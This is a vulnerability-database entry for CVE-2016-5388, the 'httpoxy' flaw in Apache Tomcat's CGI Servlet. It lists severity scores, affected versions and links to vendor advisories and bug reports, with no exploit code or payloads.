CVE-2016-5388
Severity
8.1HIGH
EPSS
36.8%
top 2.86%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
Timeline
PublishedJul 19
Latest updateMay 13
Description
Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releas…
CVSS vector
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HExploitability: 2.2 | Impact: 5.9
Affected Packages10 packages
Also affects: Enterprise Linux 7.2
Patches
🔴Vulnerability Details
5📋Vendor Advisories
4Red Hat
▶
Debian▶
CVE-2016-5388: tomcat9 - Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is ...↗2016
💬Community
4Bugzilla▶
CVE-2016-8647 Ansible: in some circumstances the mysql_user module may fail to correctly change a password↗2016-11-17
Bugzilla▶
CVE-2016-5388 Tomcat: CGI sets environmental variable based on user supplied Proxy request header [fedora-all]↗2016-09-13
Bugzilla▶
CVE-2016-5388 Tomcat: CGI sets environmental variable based on user supplied Proxy request header [epel-all]↗2016-09-13
Bugzilla▶
CVE-2016-5388 Tomcat: CGI sets environmental variable based on user supplied Proxy request header↗2016-07-08